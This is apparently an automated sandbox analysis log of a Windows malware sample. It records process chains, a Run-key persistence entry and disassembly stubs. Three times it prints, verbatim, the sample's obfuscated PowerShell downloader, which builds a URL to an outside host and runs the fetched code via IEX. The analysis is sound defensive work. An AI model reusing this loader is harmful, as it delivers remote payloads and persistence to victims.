                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Stokerfyrenes)$GlOBAl:maTerIAliSMs80 = [systEm.TEXt.EncODinG]::aScii.geTstRing($StOGy)$glOBal:PlasTIdome=$mATERIalisMs80.sUbsTrIng($tORTEReT,$NYkALkEt)<#organisationsarbejdets Rekvis
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk caJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,18_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4AD30988 push E95AD9D0h; ret 4_2_00007FFB4AD309C9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4AD38510 push eax; ret 4_2_00007FFB4AD3851D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4AD300BD pushad ; iretd 4_2_00007FFB4AD300C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_041BC890 pushfd ; ret 6_2_041BC899
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_041BB631 push esp; iretd 6_2_041BB63D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_041B371F push eax; iretd 6_2_041B3759
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232E1219 push esp; iretd 11_2_232E121A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_232D2806 push ecx; ret 11_2_232D2819
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044693D push ecx; ret 18_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044DB70 push eax; ret 18_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044DB70 push eax; ret 18_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00451D54 push eax; ret 18_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00451D34 push eax; ret 19_2_00451D41
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00444E71 push ecx; ret 19_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414060 push eax; ret 20_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414060 push eax; ret 20_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00414039 push ecx; ret 20_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LeavyJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LeavyJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004047CB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
